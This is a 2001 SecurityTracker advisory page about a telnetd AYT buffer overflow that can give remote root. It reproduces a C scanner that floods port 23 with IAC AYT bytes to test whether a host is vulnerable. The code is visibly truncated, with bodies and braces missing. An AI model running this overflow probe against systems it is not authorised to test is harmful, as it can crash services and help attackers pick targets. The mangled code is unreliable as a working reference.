Home    |    View Topics    |    Search    |    Contact Us    |   



Category:   Application (Generic)  >   Telnet Vendors:   [Multiple Authors/Vendors]
(A Scanner is Released) Re: Telnet Daemons May Give Remote Users Root Level Access Privileges
SecurityTracker Alert ID:  1002081
SecurityTracker URL:
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jul 25 2001
Impact:   Execution of arbitrary code via network, Root access via network, User access via network

Description:   TESO reported that many BSD-derived Telnet daemons (servers) contain a vulnerability that may allow a remote user to obtain root level access on the server.

A user has posted a utility that will scan for vulnerable systems. The source code is contained in the Source Message. For information on the vulnerability, see the Message History.

Impact:   A remote user can execute arbitrary code on the server with the privileges of the telnet server, which is typically root level privileges.
Solution:   No solution was available at the time of this entry.
Cause:   Boundary error
Underlying OS:  Linux (Any), UNIX (Any)
Underlying OS Comments:  many Linux and Unix OSs are vulnerable, but not all - see the Alert text for more information

Message History:   This archive entry is a follow-up to the message listed below.
Jul 18 2001 Telnet Daemons May Give Remote Users Root Level Access Privileges

 Source Message Contents

Subject:  Telnetd AYT overflow scanner

Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline

Content-Type: text/plain; charset=us-ascii
Content-Disposition: attachment; filename="SPtelnetAYT.c"

 * Telnetd AYT overflow scanner, by Security Point(R)
 *              Bug found by scut of TESO Security
 * Date: 25/07/01
 * Author: Security Point(R)
 * WWW:
 * Email:
 * This program checks for the AYT overflow realted to the
 * newly discovered telnetd vulnerabilities.
 * Tested agianst:
 *	Vulnerable:
 *		netkit-telnet-0.10
 *              FreeBSD 4.2
 *	Not vulnerable:
 *		netkit-telnet-0.17
 * Please keep us updated whith the os's that you check, and
 * report back to us on, weather the system 
 * is vulnerable or not. So we can construct a full list 
 * of vulnerable systems.
 * This source code is for educational purpose ONLY, 
 * Security Point(R) will not be responsible for any damages 
 * whatsoever that have a connection with this code. There are 
 * no warranties with regard to this information.
 * Are your networks under attack at this moment?
 * With Security Point(R) Scanner you can find and repair the
 * Vulnerabilities before the bad guys get in.
 * Please see
#include <stdio.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <netdb.h>
#include <string.h>
#include <signal.h>
#include <unistd.h>
#include <sys/socket.h>

struct in_addr addr;
struct sockaddr_in address;
struct hostent *host;
int sock;

char sendbuffer[5120*2];
char buffer[5120*2];
int i;
int timeout;

void handle_alarm(int signum) {

int main (int argc, char *argv[]) {
    printf("Telnetd AYT overflow scanner, by Security Point(R)\n");
    if (argc!=2) {
	printf("Usage: %s <host>\n", argv[0]);
    printf("Host: %s\n", argv[1]);
    if ((host=gethostbyname(argv[1])) == NULL) {
    if (( sock = socket(AF_INET, SOCK_STREAM,0)) < 0) {
    bcopy(host->h_addr, (char *)&address.sin_addr, host->h_length);
    address.sin_port = htons(23);  // telnet
    if (connect(sock, (struct sockaddr*)&address, sizeof(address)) < 0) {
    printf("Connected to remote host...\n",argv[1]);
    printf("Sending telnet options... stand by...\n");

    for (i=0;i!=(sizeof(sendbuffer)/2);i++) {
	sprintf(sendbuffer,"%s%c%c",sendbuffer,255,246); // 0xff 0xf6 - IAC AYT
    read(sock, buffer, sizeof(buffer));

    write(sock, sendbuffer, strlen(sendbuffer));

    if (read(sock, buffer, sizeof(buffer)) <=0) {
	printf("Telnetd on %s vulnerable\n",argv[1]);
    printf("Telnetd on %s not vulnerable\n",argv[1]);



Go to the Top of This SecurityTracker Archive Page

Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, LLC